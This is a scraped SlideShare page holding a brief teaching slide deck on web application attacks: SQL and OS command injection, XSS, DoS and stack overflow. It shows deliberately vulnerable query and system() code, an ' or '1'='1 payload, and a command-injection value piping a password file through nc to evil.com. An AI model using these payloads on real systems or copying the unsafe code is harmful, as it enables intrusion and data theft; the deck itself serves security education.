SlideShare a Scribd company logo
2
Most read
Web Application Attack
Nguyễn Kiều Khoa
- A web application or web app is any software that runs
in a web browser. It is created in a browser-supported
programming language (such as the combination of
JavaScript, HTML and CSS) and relies on a web browser
to render the application.
http://en.wikipedia.org/wiki/Web_application
What is a web application?
1.Injection (SQL Injection)
db.ExecuteReader("select * from users where name='"
+ Request["user"] + "' and password='"
+ Request["password"] + "'");
- Suppose the user request parameter is …' or
'1'='1
- Then the query we execute is … (note that and has
precedence over or)
select * from users where name='' or '1'='1'
- Suppose we’re too lazy to perform DNS lookup, so we
resort to the following:
- Suppose the hostname parameter is …
foo || cat /etc/password | nc evil.com
- Then we end up sending the password file to evil.com
1.Injection (OS Command)
system("nslookup " + Request["hostname"]);
- Injecting JavaScript into pages viewed by other users.
2.Cross-Site Scripting
- denial-of-service (DoS) or distributed denial-of-service
(DDoS) attack is an attempt to make a machine or
network resource unavailable to its intended users
http://en.wikipedia.org/wiki/Denial-of-service_attack
3.DoS and DDoS
- A stack buffer overflow or stack buffer overrun occurs
when a program writes to a memory address on the
program's call stack outside of the intended data
structure, which is usually a fixed-length buffer.
4.Stack Overflow
Q&A

More Related Content

PPTX
Web application attacks
PDF
Common Web Application Attacks
PPTX
Web Security Attacks
PPTX
Cross site scripting XSS
PPTX
Website hacking and prevention (All Tools,Topics & Technique )
PPTX
Error codes & custom 404s
PPTX
Presentation on Web Attacks
Web application attacks
Common Web Application Attacks
Web Security Attacks
Cross site scripting XSS
Website hacking and prevention (All Tools,Topics & Technique )
Error codes & custom 404s
Presentation on Web Attacks

What's hot (20)

PPT
Hacking A Web Site And Secure Web Server Techniques Used
PPTX
Web Hacking Series Part 4
PPTX
Owasp Top 10 A1: Injection
PPTX
Owasp Top 10 A3: Cross Site Scripting (XSS)
PPTX
Web Hacking Intro
PDF
Pentesting RESTful webservices
PPTX
Security asp.net application
PPTX
Avoiding Cross Site Scripting - Not as easy as you might think
PPT
Secure code practices
PPT
PDF
Owasp top 10 2013
PDF
Sql Injection and XSS
PDF
CSRF, ClickJacking & Open Redirect
PDF
2013 OWASP Top 10
PPTX
Web Hacking Series Part 1
PPTX
Rapid Android Application Security Testing
PPTX
Secure Code Warrior - Cross site scripting
PDF
Hack proof your ASP NET Applications
PDF
Web Security 101
Hacking A Web Site And Secure Web Server Techniques Used
Web Hacking Series Part 4
Owasp Top 10 A1: Injection
Owasp Top 10 A3: Cross Site Scripting (XSS)
Web Hacking Intro
Pentesting RESTful webservices
Security asp.net application
Avoiding Cross Site Scripting - Not as easy as you might think
Secure code practices
Owasp top 10 2013
Sql Injection and XSS
CSRF, ClickJacking & Open Redirect
2013 OWASP Top 10
Web Hacking Series Part 1
Rapid Android Application Security Testing
Secure Code Warrior - Cross site scripting
Hack proof your ASP NET Applications
Web Security 101
Ad

Viewers also liked (20)

PDF
Behind The Scenes Of Web Attacks
PPTX
Anatomy Web Attack
PPTX
Web Application Vulnerabilities
PPTX
Lesson 6 web based attacks
PPT
Web attacks
PPT
Web Attacks - Top threats - 2010
PDF
Top Ten Web Attacks
PPT
Trends in Web Attacks
PDF
QualysGuard InfoDay 2013 - Web Application Firewall
PPTX
Hacking Web: Attacks & Tips
PPTX
Pentesting iPhone applications
ODP
Web Application Firewall
PPTX
Security-Web Vulnerabilities-Browser Attacks
PPT
Why You Need A Web Application Firewall
PPTX
Radware - WAF (Web Application Firewall)
PDF
Citrix & Canalys: Northern European Channel Partners in a State of Transforma...
PPTX
Web Browsers
PPTX
Web application security: Threats & Countermeasures
PPTX
Types of cyber attacks
Behind The Scenes Of Web Attacks
Anatomy Web Attack
Web Application Vulnerabilities
Lesson 6 web based attacks
Web attacks
Web Attacks - Top threats - 2010
Top Ten Web Attacks
Trends in Web Attacks
QualysGuard InfoDay 2013 - Web Application Firewall
Hacking Web: Attacks & Tips
Pentesting iPhone applications
Web Application Firewall
Security-Web Vulnerabilities-Browser Attacks
Why You Need A Web Application Firewall
Radware - WAF (Web Application Firewall)
Citrix & Canalys: Northern European Channel Partners in a State of Transforma...
Web Browsers
Web application security: Threats & Countermeasures
Types of cyber attacks
Ad

Similar to Web application attack Presentation (20)

PPTX
Hacking WebApps for fun and profit : how to approach a target?
PDF
The top 10 security issues in web applications
PDF
Defcon 17-joseph mccray-adv-sql_injection
PDF
Drupal Security Seminar
PPT
Php & Web Security - PHPXperts 2009
PPTX
ASP.NET Web Security
KEY
Cross Site Scripting - Mozilla Security Learning Center
KEY
DVWA BruCON Workshop
PDF
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
PPTX
Network And Application Layer Attacks
PDF
4 andrii kudiurov - web application security 101
PPT
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
PDF
[Poland] It's only about frontend
PDF
Building Client-Side Attacks with HTML5 Features
PDF
WebView security on iOS (EN)
PDF
Web Application Security in Rails
PPTX
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
PPTX
Understanding and preventing sql injection attacks
PDF
16 Web Application Penetration Testing 102.pdf
PDF
ruxc0n 2012
Hacking WebApps for fun and profit : how to approach a target?
The top 10 security issues in web applications
Defcon 17-joseph mccray-adv-sql_injection
Drupal Security Seminar
Php & Web Security - PHPXperts 2009
ASP.NET Web Security
Cross Site Scripting - Mozilla Security Learning Center
DVWA BruCON Workshop
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
Network And Application Layer Attacks
4 andrii kudiurov - web application security 101
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
[Poland] It's only about frontend
Building Client-Side Attacks with HTML5 Features
WebView security on iOS (EN)
Web Application Security in Rails
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Understanding and preventing sql injection attacks
16 Web Application Penetration Testing 102.pdf
ruxc0n 2012

More from Khoa Nguyen (6)

PPTX
Coding convention
PPTX
Network security - Basic concepts
PPTX
Network security (Mã hóa hiện đại)
PPTX
Network fundamental presentation
PPTX
Hibernate Basic Concepts - Presentation
PPTX
Bible app on android
Coding convention
Network security - Basic concepts
Network security (Mã hóa hiện đại)
Network fundamental presentation
Hibernate Basic Concepts - Presentation
Bible app on android

Recently uploaded (20)

PPTX
Cloud computing and distributed systems.
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
PPT
Teaching material agriculture food technology
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
PPTX
MYSQL Presentation for SQL database connectivity
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
PDF
Encapsulation theory and applications.pdf
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PDF
MIND Revenue Release Quarter 2 2025 Press Release
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
PDF
Empathic Computing: Creating Shared Understanding
PDF
Encapsulation_ Review paper, used for researhc scholars
PPTX
sap open course for s4hana steps from ECC to s4
Cloud computing and distributed systems.
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
Teaching material agriculture food technology
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
MYSQL Presentation for SQL database connectivity
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Advanced methodologies resolving dimensionality complications for autism neur...
Agricultural_Statistics_at_a_Glance_2022_0.pdf
Encapsulation theory and applications.pdf
Diabetes mellitus diagnosis method based random forest with bat algorithm
Mobile App Security Testing_ A Comprehensive Guide.pdf
Digital-Transformation-Roadmap-for-Companies.pptx
MIND Revenue Release Quarter 2 2025 Press Release
Building Integrated photovoltaic BIPV_UPV.pdf
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
Reach Out and Touch Someone: Haptics and Empathic Computing
Empathic Computing: Creating Shared Understanding
Encapsulation_ Review paper, used for researhc scholars
sap open course for s4hana steps from ECC to s4

Web application attack Presentation

  • 2. - A web application or web app is any software that runs in a web browser. It is created in a browser-supported programming language (such as the combination of JavaScript, HTML and CSS) and relies on a web browser to render the application. http://en.wikipedia.org/wiki/Web_application What is a web application?
  • 3. 1.Injection (SQL Injection) db.ExecuteReader("select * from users where name='" + Request["user"] + "' and password='" + Request["password"] + "'"); - Suppose the user request parameter is …' or '1'='1 - Then the query we execute is … (note that and has precedence over or) select * from users where name='' or '1'='1'
  • 4. - Suppose we’re too lazy to perform DNS lookup, so we resort to the following: - Suppose the hostname parameter is … foo || cat /etc/password | nc evil.com - Then we end up sending the password file to evil.com 1.Injection (OS Command) system("nslookup " + Request["hostname"]);
  • 5. - Injecting JavaScript into pages viewed by other users. 2.Cross-Site Scripting
  • 6. - denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users http://en.wikipedia.org/wiki/Denial-of-service_attack 3.DoS and DDoS
  • 7. - A stack buffer overflow or stack buffer overrun occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer. 4.Stack Overflow
  • 8. Q&A